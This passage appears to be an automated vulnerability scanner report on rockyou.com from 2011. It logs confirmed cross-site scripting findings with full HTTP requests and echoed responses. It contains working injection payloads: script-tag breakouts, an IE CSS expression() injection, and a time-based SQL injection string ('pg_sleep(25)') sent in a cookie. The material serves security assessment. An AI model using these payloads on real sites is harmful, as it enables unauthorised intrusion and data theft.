</div>
</div>
<div style="margin-top:10px;width:160px;overflow:hidden;padding:0px;text-align:center;">
<!-- YB: right_bottom (160x600) -->
<script type="text/javascript"><!--
yieldbuild_client = 4;
yieldbuild_loc = "right_bottom";
yieldbuild_options = {};
//--></script>
<script type="text/javascript" src="http://yieldbuild.com/javascripts/s_ad.js"></script>
</div>
</div>
<br><br>
<div class="tp" style="text-align:center">
Copyright © 2008 RockYou | Member of the Alloy Online Advertising Network<br><a target="_BLANK" href="/help">FAQ / Help</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-helpspace&url=http%3A%2F%2Fwww.rockyou.com%2Fhelpspace">MySpace Profile Tips</a> | <a target="_BLANK" href="/privacypolicy.php">Privacy</a> | <a href="/tos.php" target=_blank>Terms of Use</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com%2F" target="_blank">Facebook Advertisers</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-dev-pub&url=http%3A%2F%2Fwww.rockyouads.com%2F" target="_blank">Facebook Developers</a> | <a href="/corp/about.php" target=_blank>About Us</a></div>
<div class="tp" style="text-align:center">
<a href="?lang=en&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">English</a> | <a href="?lang=zh&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">中文</a> | <a href="?lang=es&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">Español | <a href="?lang=pt&instanceid='"--></style></script><script>netsparker(0x0016AC)</script>">Português</a></a>
</div>
<br>
<br>
<script language="javascript">
if (navigator.cookieEnabled && document.cookie.indexOf('AAMBLFLAG=') == -1) {
var blTomorrow = new Date();
blTomorrow.setTime(blTomorrow.getTime() + 86400000);
document.cookie = 'AAMBLFLAG=SET; expires=' + blTomorrow.toGMTString();
if (document.cookie.indexOf('AAMBLFLAG=') > -1)
document.wr..
|
- /partner/funmobility-entry.php
/partner/funmobility-entry.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| img | GET | " stYle="x:expre/**/ssion(alert(9)) |
Request
GET /partner/funmobility-entry.php?img=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165190; ctid=2; sns_type=facebook.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165190; ctid=2; sns_type=facebook.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:19:50 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=7323 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 3107
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Mobile Wallpapers from FunMobility</title>
<script type="text/javascript" src="javascripts/prototype.js"></script>
<script>
function clearChild(parentNode)
{
while (parentNode.hasChildNodes())
{
parentNode.removeChild(parentNode.firstChild);
}
}
function getCarrier()
{
xmlhttpPostURL("mode=carrier","/partner/funmobility-ajax.php");
}
function getManufacturer()
{
carrierVal = document.getElementById('carrierselect').value;
if (carrierVal != "")
xmlhttpPostURL("mode=manufacturer&car="+carrierVal,"/partner/funmobility-ajax.php");
}
function getDevice()
{
manVal = document.getElementById('manufacturerselect').value;
carrierVal = document.getElementById('carrierselect').value;
if (manVal != "" && carrierVal != "")
xmlhttpPostURL("mode=device&car="+carrierVal+"&man="+manVal,"/partner/funmobility-ajax.php");
}
function finishForm()
{
if (validatePhone()==true)
{
manVal = document.getElementById('manufacturerselect').value;
carrierVal = document.getElementById('carrierselect').value;
deviceVal = document.getElementById('deviceselect').value;
phoneVal = document.getElementById('phoneinput').value;
imageVal = document.getElementById('imagehidden').value;
emailVal = document.getElementById('emailinput').value;
if (manVal != "" && carrierVal != "" && deviceVal != "") {
xmlhttpPostURL("mode=finish&car="+carrierVal+"&man="+manVal+"&device="+deviceVal+"&phone="+phoneVal.replace('-','').replace('-','')+"&email="+emailVal+"&image="+imageVal,"/partner/funmobility-ajax.php");
}
}
return false;
}
function initCarrier(indata)
{
selectNode = document.getElementById('carrierselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Carrier ---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function initManufacturer(indata)
{
selectNode = document.getElementById('manufacturerselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Make ---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function initDevice(indata)
{
selectNode = document.getElementById('deviceselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Model---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function showInstructions(indata)
{
selectNode = document.getElementById('instructions');
var instructionString = indata.unescapeHTML();
var line_array=instructionString.split("<br>");
if (line_array.length > 12)
{
selectNode.innerHTML = '<a style="font-family: Verdana, Arial, sans-serif; font-size: 10px">' + instructionString + '</a>';
} else
{
selectNode.innerHTML = '<a style="font-family: Verdana, Arial, sans-serif; font-size: 12px">' + instructionString + '</a>';
}
}
function showDownloadCode(indata)
{
if (indata != null && indata.length > 0)
{
selectNode = document.getElementById('code');
selectNode.innerHTML = '<a>Download Code: ' + indata +'</a>';
}
}
function showPricing(indata)
{
if (indata != null && indata.length > 0)
{
selectNode = document.getElementById('pricing');
selectNode.innerHTML = '<a>' + indata +'</a>';
}
}
function xmlhttpPostURL(data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url, true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
eval ("var resp = " + self.xmlHttpReq.responseText);
if (resp['mode']=='carrier')
{
initCarrier(resp['data']);
}
if (resp['mode']=='manufacturer')
{
initManufacturer(resp['data']);
}
if (resp['mode']=='device')
{
initDevice(resp['data']);
}
if (resp['mode']=='finish')
{
showPricing(resp['pricing']);
showInstructions(resp['instructions']);
showDownloadCode(resp['downloadcode']);
}
}
}
self.xmlHttpReq.send(data);
}
function validatePhone(){
mobiletypeform.phoneinput.value = mobiletypeform.phonenumber1.value + mobiletypeform.phonenumber2.value + mobiletypeform.phonenumber3.value;
var Phone=document.mobiletypeform.phoneinput.value
if (checkPhone(Phone)==false){
document.mobiletypeform.phonenumber1.focus();
return false;
}
return true;
}
function checkPhone(strPhone)
{
var phoneNumberDelimiters = "()- ";
var digitsInPhoneNumber = 10;
s=stripCharsInBag(strPhone,phoneNumberDelimiters);
if (s==null || s=="" || !isInteger(s) || s.length != digitsInPhoneNumber){
alert("Please enter a valid 10 digit number in the form '415 111 2222'");
return false;
}
if ((s.substring(0,3)=="555")){
alert("Please enter a valid area code");
return false;
}
return true;
}
function stripCharsInBag(s, bag)
{ var i;
var returnString = "";
// Search through string's characters one by one.
// If character is not in bag, append to returnString.
for (i = 0; i < s.length; i++)
{
// Check that current character isn't whitespace.
var c = s.charAt(i);
if (bag.indexOf(c) == -1) returnString += c;
}
return returnString;
}
function isInteger(s)
{ var i;
for (i = 0; i < s.length; i++)
{
// Check that current character is number.
var c = s.charAt(i);
if (((c < "0") || (c > "9"))) return false;
}
// All characters are numbers.
return true;
}
function autoTab(curField,toField,maxlength){
if (curField.getAttribute && curField.value.length==maxlength)
{
toField.focus();
}
}
</script>
<style>
body {background:url(images/background.gif) top no-repeat; font-family: verdana, ariel; font-size: 11px;}
table{margin-left:10px; }
td {font-size: 12px;}
#title{background:url(images/entryboxTitleBg.gif) top no-repeat; width: 264px; height:28px; text-align: center; }
#pulldown {background:url(images/entryboxbg.gif) top no-repeat; width: 253px; height:180px; padding: 6px 6px 6px 6px; }
select{font-family: Verdana, Arial, sans-serif; font-size: 12px; width:170px;}
.col{text-align:left;}
#titleTxt {text-align:center; padding: 6px 2px 2px 2px; font-size: 12px; color:#999; font-weight: bold; }
</style>
</head>
<body onload="getCarrier();">
<div style="margin: auto; text-align: center;"><img src="images/header.jpg" /></div>
<form name="mobiletypeform">
<img src="" stYle="x:expre/**/ssion(netsparker(9))" width="200" style="float:right;margin-right:50px" />
<div id="pricing" style="margin:10px"></div>
<div id="instructions" style="margin:10px;">
<div id="title">
<div id="titleTxt">Enter your mobile information</div>
</div>
<div id="pulldown">
<table cellpadding="3" width="235" border="0" cellspacing="0">
<tr>
<td>
<select id='carrierselect' onchange='getManufacturer();' name='carrier' />
</td>
</tr>
<tr>
<td>
<select id='manufacturerselect' onchange='getDevice();' name='manufacturer' />
</td>
</tr>
<tr>
<td>
<select id='deviceselect' name='device'/>
</td>
</tr>
<tr valign="top">
<td nowrap>
<input type="text" name="phonenumber1" maxlength="3" size="3" value="" onKeyup="autoTab(this, document.mobiletypeform.phonenumber2,3)" />
<input type="text" name="phonenumber2" maxlength="3" size="3" value="" onKeyup="autoTab(this, document.mobiletypeform.phonenumber3,3)" />
<input type="text" name="phonenumber3" maxlength="4" size="4" value="" />
(mobile #)
<input type="hidden" id="phoneinput" name="phoneinput" value="" />
<br>
<input id="imagehidden" type="hidden" name="image" value="" stYle="x:expre/**/ssion(netsparker(9))"/>
</td>
</tr>
<tr><td nowrap>(your email)<br /><input type="text" id="emailinput" name="emailinput" size="24" value=""/></td></tr>
</table>
</div>
<table cellpadding="0" width="235" border="0" cellspacing="0">
<tr>
<td align="center">
<br>
Click "Send" to get your new wallpaper
</td>
</tr>
<tr>
<td>
<input type="image" src="images/send.gif" onclick="return finishForm();" value="Send" />
</td>
</tr>
<tr>
<td align="center">
<a style="font-family: Verdana, Arial, sans-serif; font-size: 10px; color:#666666;">By clicking the send button, you agree to standard Text and Messaging charges from your carrier.</a>
</td>
</tr>
</table>
</div>
<div id="code" style="margin:10px; font-size: 150%; font-weight: bold; color:#3333FF;"></div>
</form>
<img src="images/footer.gif" />
</body>
<!-- Funmobility Google Tracking Code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-2551011-1";
urchinTracker();
</script>
<!-- /Funmobility Google Tracking Code -->
</html>
Date: Mon, 18 Apr 2011 22:19:50 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=7323 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 3107
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Mobile Wallpapers from FunMobility</title>
<script type="text/javascript" src="javascripts/prototype.js"></script>
<script>
function clearChild(parentNode)
{
while (parentNode.hasChildNodes())
{
parentNode.removeChild(parentNode.firstChild);
}
}
function getCarrier()
{
xmlhttpPostURL("mode=carrier","/partner/funmobility-ajax.php");
}
function getManufacturer()
{
carrierVal = document.getElementById('carrierselect').value;
if (carrierVal != "")
xmlhttpPostURL("mode=manufacturer&car="+carrierVal,"/partner/funmobility-ajax.php");
}
function getDevice()
{
manVal = document.getElementById('manufacturerselect').value;
carrierVal = document.getElementById('carrierselect').value;
if (manVal != "" && carrierVal != "")
xmlhttpPostURL("mode=device&car="+carrierVal+"&man="+manVal,"/partner/funmobility-ajax.php");
}
function finishForm()
{
if (validatePhone()==true)
{
manVal = document.getElementById('manufacturerselect').value;
carrierVal = document.getElementById('carrierselect').value;
deviceVal = document.getElementById('deviceselect').value;
phoneVal = document.getElementById('phoneinput').value;
imageVal = document.getElementById('imagehidden').value;
emailVal = document.getElementById('emailinput').value;
if (manVal != "" && carrierVal != "" && deviceVal != "") {
xmlhttpPostURL("mode=finish&car="+carrierVal+"&man="+manVal+"&device="+deviceVal+"&phone="+phoneVal.replace('-','').replace('-','')+"&email="+emailVal+"&image="+imageVal,"/partner/funmobility-ajax.php");
}
}
return false;
}
function initCarrier(indata)
{
selectNode = document.getElementById('carrierselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Carrier ---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function initManufacturer(indata)
{
selectNode = document.getElementById('manufacturerselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Make ---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function initDevice(indata)
{
selectNode = document.getElementById('deviceselect');
clearChild(selectNode);
newOption = document.createElement('option');
newOption.appendChild(document.createTextNode("--- Choose a Model---"));
selectNode.appendChild(newOption);
for (i = 0; i < indata.length; i++)
{
newOption = document.createElement('option');
newOption.setAttribute('value', indata[i]['id']);
newOption.appendChild(document.createTextNode(indata[i]['name']));
selectNode.appendChild(newOption);
}
}
function showInstructions(indata)
{
selectNode = document.getElementById('instructions');
var instructionString = indata.unescapeHTML();
var line_array=instructionString.split("<br>");
if (line_array.length > 12)
{
selectNode.innerHTML = '<a style="font-family: Verdana, Arial, sans-serif; font-size: 10px">' + instructionString + '</a>';
} else
{
selectNode.innerHTML = '<a style="font-family: Verdana, Arial, sans-serif; font-size: 12px">' + instructionString + '</a>';
}
}
function showDownloadCode(indata)
{
if (indata != null && indata.length > 0)
{
selectNode = document.getElementById('code');
selectNode.innerHTML = '<a>Download Code: ' + indata +'</a>';
}
}
function showPricing(indata)
{
if (indata != null && indata.length > 0)
{
selectNode = document.getElementById('pricing');
selectNode.innerHTML = '<a>' + indata +'</a>';
}
}
function xmlhttpPostURL(data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url, true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
eval ("var resp = " + self.xmlHttpReq.responseText);
if (resp['mode']=='carrier')
{
initCarrier(resp['data']);
}
if (resp['mode']=='manufacturer')
{
initManufacturer(resp['data']);
}
if (resp['mode']=='device')
{
initDevice(resp['data']);
}
if (resp['mode']=='finish')
{
showPricing(resp['pricing']);
showInstructions(resp['instructions']);
showDownloadCode(resp['downloadcode']);
}
}
}
self.xmlHttpReq.send(data);
}
function validatePhone(){
mobiletypeform.phoneinput.value = mobiletypeform.phonenumber1.value + mobiletypeform.phonenumber2.value + mobiletypeform.phonenumber3.value;
var Phone=document.mobiletypeform.phoneinput.value
if (checkPhone(Phone)==false){
document.mobiletypeform.phonenumber1.focus();
return false;
}
return true;
}
function checkPhone(strPhone)
{
var phoneNumberDelimiters = "()- ";
var digitsInPhoneNumber = 10;
s=stripCharsInBag(strPhone,phoneNumberDelimiters);
if (s==null || s=="" || !isInteger(s) || s.length != digitsInPhoneNumber){
alert("Please enter a valid 10 digit number in the form '415 111 2222'");
return false;
}
if ((s.substring(0,3)=="555")){
alert("Please enter a valid area code");
return false;
}
return true;
}
function stripCharsInBag(s, bag)
{ var i;
var returnString = "";
// Search through string's characters one by one.
// If character is not in bag, append to returnString.
for (i = 0; i < s.length; i++)
{
// Check that current character isn't whitespace.
var c = s.charAt(i);
if (bag.indexOf(c) == -1) returnString += c;
}
return returnString;
}
function isInteger(s)
{ var i;
for (i = 0; i < s.length; i++)
{
// Check that current character is number.
var c = s.charAt(i);
if (((c < "0") || (c > "9"))) return false;
}
// All characters are numbers.
return true;
}
function autoTab(curField,toField,maxlength){
if (curField.getAttribute && curField.value.length==maxlength)
{
toField.focus();
}
}
</script>
<style>
body {background:url(images/background.gif) top no-repeat; font-family: verdana, ariel; font-size: 11px;}
table{margin-left:10px; }
td {font-size: 12px;}
#title{background:url(images/entryboxTitleBg.gif) top no-repeat; width: 264px; height:28px; text-align: center; }
#pulldown {background:url(images/entryboxbg.gif) top no-repeat; width: 253px; height:180px; padding: 6px 6px 6px 6px; }
select{font-family: Verdana, Arial, sans-serif; font-size: 12px; width:170px;}
.col{text-align:left;}
#titleTxt {text-align:center; padding: 6px 2px 2px 2px; font-size: 12px; color:#999; font-weight: bold; }
</style>
</head>
<body onload="getCarrier();">
<div style="margin: auto; text-align: center;"><img src="images/header.jpg" /></div>
<form name="mobiletypeform">
<img src="" stYle="x:expre/**/ssion(netsparker(9))" width="200" style="float:right;margin-right:50px" />
<div id="pricing" style="margin:10px"></div>
<div id="instructions" style="margin:10px;">
<div id="title">
<div id="titleTxt">Enter your mobile information</div>
</div>
<div id="pulldown">
<table cellpadding="3" width="235" border="0" cellspacing="0">
<tr>
<td>
<select id='carrierselect' onchange='getManufacturer();' name='carrier' />
</td>
</tr>
<tr>
<td>
<select id='manufacturerselect' onchange='getDevice();' name='manufacturer' />
</td>
</tr>
<tr>
<td>
<select id='deviceselect' name='device'/>
</td>
</tr>
<tr valign="top">
<td nowrap>
<input type="text" name="phonenumber1" maxlength="3" size="3" value="" onKeyup="autoTab(this, document.mobiletypeform.phonenumber2,3)" />
<input type="text" name="phonenumber2" maxlength="3" size="3" value="" onKeyup="autoTab(this, document.mobiletypeform.phonenumber3,3)" />
<input type="text" name="phonenumber3" maxlength="4" size="4" value="" />
(mobile #)
<input type="hidden" id="phoneinput" name="phoneinput" value="" />
<br>
<input id="imagehidden" type="hidden" name="image" value="" stYle="x:expre/**/ssion(netsparker(9))"/>
</td>
</tr>
<tr><td nowrap>(your email)<br /><input type="text" id="emailinput" name="emailinput" size="24" value=""/></td></tr>
</table>
</div>
<table cellpadding="0" width="235" border="0" cellspacing="0">
<tr>
<td align="center">
<br>
Click "Send" to get your new wallpaper
</td>
</tr>
<tr>
<td>
<input type="image" src="images/send.gif" onclick="return finishForm();" value="Send" />
</td>
</tr>
<tr>
<td align="center">
<a style="font-family: Verdana, Arial, sans-serif; font-size: 10px; color:#666666;">By clicking the send button, you agree to standard Text and Messaging charges from your carrier.</a>
</td>
</tr>
</table>
</div>
<div id="code" style="margin:10px; font-size: 150%; font-weight: bold; color:#3333FF;"></div>
</form>
<img src="images/footer.gif" />
</body>
<!-- Funmobility Google Tracking Code -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-2551011-1";
urchinTracker();
</script>
<!-- /Funmobility Google Tracking Code -->
</html>
|
- /viewcategory.php
/viewcategory.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| s_catid | GET | '"--></style></script><script>alert(0x001BBA)</script> |
Request
GET /viewcategory.php?s_catid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001BBA)%3C/script%3E HTTP/1.1
Referer: http://www.rockyou.com/categorylist.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165507; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/categorylist.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165507; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:25:07 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:25:06 GMT; path=/; domain=.rockyou.com,lastlogin=1303165507; expires=Wed, 27-Jul-2011 22:25:07 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:25:07 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=15701 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 4123
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<link href="css/browse.css" rel="stylesheet" type="text/css">
<div class="header">
<div style="float:left; font-family:Arial, Helvetica, sans-serif; font-size:16px;">
<a href="/choose_widget.php">Create</a> |
